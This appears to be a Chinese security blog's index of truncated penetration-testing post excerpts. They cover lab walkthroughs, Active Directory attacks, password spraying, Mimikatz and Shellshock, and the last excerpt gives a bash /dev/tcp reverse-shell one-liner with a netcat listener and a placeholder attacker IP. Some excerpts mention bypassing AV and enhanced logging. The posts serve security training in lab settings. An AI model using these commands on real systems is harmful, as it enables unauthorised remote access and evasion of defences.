枚举和滥用API
在许多情况下,我们的渗透测试目标是内部构建的闭源 Web 应用程序,附带许多应用程序编程接口 (API)。这些 API 负责与后端逻辑交互,并为 Web 应用程序提供坚实的功能支柱。名为表述性状态传输 ...
Magic Magic Bytes Head文件上传绕过 mysqldump
简介MetaDifficulty Medium 实验环境攻击者 Kali 10.10.16.9受害者 IP 10.10.10.185 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 10.10.10.14522 80 开启 gobuster爆破gobuster dir -...
Objective 5
任务攻击部署在dcorp-studentx并且提权到本地管理员找到一个本地本地管理员可以登录的域机器使用Jenkins的user权限 得到管理员权限 服务部署在172.16.3.11:8080 C:\AD\Tools\InviShell\RunWith...
对 Active Directory 身份验证执行攻击1 密码喷射
1. 密码攻击在探索这些攻击之前,我们需要考虑一个重要的因素。在执行暴力或单词列表身份验证攻击时,我们必须注意帐户锁定。登录失败次数过多可能会阻止帐户遭受进一步的攻击,并可能向系统管...
VulnOS v2靶机的两种方法渗透测试详解
实验环境攻击者 Kali 192.168.0.103受害者 VulnOS v2 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.0.0/24受害者IP为192.168.0.101 收集受害者服务详情nmap -sV -A 192.168.0...
Symfonos:3 shellshock新方法 python库注入
实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.183 Linux 1. 信息收集在/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 中的cgi-bin的后面加一个/ gobutser扫...
Objective 3
任务枚举以下内容在dollarcorp domain:域管理员组的ACL所有改变的studentx的权限 运行 invishell 脚本以避免增强日志记录 否则导入PowerView.ps1会被av拦截C:\AD\Tools\InviShell\RunWithRegis...
DepthB2R SSH远程代码执行
简介point 8DepthB2RDifficulty Intermediaterated by community HARD 实验环境攻击者 Kali 192.168.45.168受害者 IP 192.168.170.21 Linux 1. 信息收集收集受害者服务详情nmap -sV -A 19...
Keberos认证及Mimikatz基本使用
自 Windows Server 2003 以来,Kerberos 一直被用作 Microsoft 的主要身份验证机制。NTLM 身份验证通过质询和响应范例进行工作,而基于 Windows 的 Kerberos 身份验证则使用票证系统。 1. Kebe...
交互式shell和稳定shell的建立
1. python方式建立交互式shell攻击者先监听nc -lvnp 监听端口 受害者bash -c 'bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1'再攻击者端就能得到shell 如果有python 可以使用...